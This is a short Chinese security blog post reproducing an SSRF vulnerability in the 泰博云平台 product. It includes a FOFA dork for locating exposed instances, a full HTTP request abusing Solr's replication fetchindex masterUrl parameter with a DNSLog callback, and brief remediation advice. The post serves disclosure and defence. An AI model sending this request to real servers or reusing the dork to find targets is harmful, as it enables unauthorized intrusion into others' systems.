免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。
漏洞描述
SSRF漏洞是一种在未能获取服务器权限时,利用服务器漏洞,由攻击者构造请求,服务器端发起请求的安全漏洞,攻击者可以利用该漏洞诱使服务器端应用程序向攻击者选择的任意域发出HTTP请求
漏洞再现
FOFA: title="泰博云平台"
在http://ip:端口/default/index.jsp页面抓包,在DNSLog Platform获得一个网址,修改请求包
GET /solr/collection1/replication/?command=fetchindex&masterUrl=http://sn3xuh.dnslog.cn HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://fofa.info/
Connection: close
Cookie: JSESSIONID=qugwx7wm5eot
Upgrade-Insecure-Requests: 1
Priority: u=0, i
修复建议
限制接口访问权限:确保只有经过身份验证的用户才能访问敏感接口。
更新到安全版本:及时更新软件到最新的安全版本,以修补已知漏洞。